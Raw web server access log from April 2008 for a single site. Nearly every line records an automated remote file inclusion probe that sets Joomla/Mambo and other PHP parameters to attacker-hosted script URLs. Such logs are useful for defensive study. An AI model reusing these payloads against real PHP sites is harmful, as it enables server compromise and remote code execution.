209.67.208.250 - - [10/Apr/2008:12:57:32 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.810" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:12:57:56 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:12:57:58 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:12:58:01 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:12:58:04 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:12:58:30 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:12:58:46 -0700] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:12:58:46 -0700] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:12:58:47 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:12:58:47 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:58:56 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:58:56 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
202.3.229.166 - - [10/Apr/2008:12:59:02 -0700] "GET /logs/access_080128.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.3.229.166 - - [10/Apr/2008:12:59:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.3.229.166 - - [10/Apr/2008:12:59:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:59:28 -0700] "GET /logs/access_080321.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:59:29 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:59:30 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:59:37 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.37.130 - - [10/Apr/2008:12:59:42 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.exploreoceans.org/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:12:59:46 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:12:59:47 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:12:59:48 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:00:06 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:13:00:21 -0700] "GET /logs/access_080223.log//lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:13:00:21 -0700] "GET /logs//lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:00:40 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:00:40 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:00:41 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:13:01:04 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:13:01:04 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:13:01:45 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.167 - - [10/Apr/2008:13:02:08 -0700] "GET /logs/access_080207.log HTTP/1.0" 200 1044836 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.3.229.166 - - [10/Apr/2008:13:02:48 -0700] "GET /logs/access_080312.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.128.164 - - [10/Apr/2008:13:02:52 -0700] "GET /logs/access_080321.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.164 - - [10/Apr/2008:13:02:54 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.164 - - [10/Apr/2008:13:02:55 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:03:10 -0700] "GET /logs/access_080321.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:03:12 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:03:12 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:03:20 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:03:20 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:03:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.9.37.130 - - [10/Apr/2008:13:03:33 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.exploreoceans.org/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [10/Apr/2008:13:03:34 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.exploreoceans.org/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [10/Apr/2008:13:03:34 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.exploreoceans.org/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:13:03:34 -0700] "GET /logs/access_080219.log//lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.164 - - [10/Apr/2008:13:03:36 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:13:03:42 -0700] "GET /logs/access_080321.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:13:03:42 -0700] "GET /logs/access_080321.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:03:57 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:04:38 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:13:05:25 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:13:05:25 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:13:05:25 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:13:06:22 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:13:06:22 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:13:06:23 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:13:07:22 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:07:33 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
213.194.149.65 - - [10/Apr/2008:13:07:49 -0700] "GET /logs/access_080308.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.65 - - [10/Apr/2008:13:07:49 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.65 - - [10/Apr/2008:13:07:49 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:08:32 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.194.149.65 - - [10/Apr/2008:13:08:37 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:13:09:40 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:13:09:40 -0700] "GET /include/functions_common.php?gl_root_path=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:13:09:40 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:10:21 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:10:23 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:10:25 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:13:10:33 -0700] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:13:10:33 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:13:11:57 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:12:18 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:13:10 -0700] "GET /logs/access_080207.log/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:13:14 -0700] "GET /index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:13:16 -0700] "GET /logs/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:13:14:12 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:13:14:13 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:13:14:13 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:14:41 -0700] "GET /logs/access_080207.log/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:14:45 -0700] "GET /index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:14:48 -0700] "GET /logs/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:14:49 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:14:50 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:14:51 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.23.98 - - [10/Apr/2008:13:15:07 -0700] "GET /minamijewelry/bird.psd HTTP/1.0" 200 109644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:13:15:19 -0700] "GET //index.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:16:25 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:13:17:32 -0700] "GET /logs/access.log/view.php?sub=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:13:17:32 -0700] "GET /view.php?sub=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:13:17:33 -0700] "GET /logs/view.php?sub=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [10/Apr/2008:13:18:08 -0700] "GET /logs/access_080308.log/index.php?pg=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [10/Apr/2008:13:18:16 -0700] "GET /logs/index.php?pg=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:18:19 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:13:21:07 -0700] "GET /logs/access_071229.log/view.php?table=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:13:21:08 -0700] "GET /view.php?table=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:13:21:08 -0700] "GET /logs/view.php?table=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:13:21:49 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:22:53 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:22:53 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:22:53 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:22:53 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:22:53 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:22:53 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.48.170 - - [10/Apr/2008:13:22:54 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.elite-warriors.eu/main//vwar/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.214.48.170 - - [10/Apr/2008:13:22:54 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.elite-warriors.eu/main//vwar/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:24:50 -0700] "GET /logs/access_080308.log/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:13:25:47 -0700] "GET /logs/access_080120.log/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:13:25:47 -0700] "GET /logs/access_080120.log/index.php?fn=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:13:25:47 -0700] "GET /logs/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:13:25:48 -0700] "GET /logs/index.php?fn=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:27:24 -0700] "GET /logs/access_080308.log/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
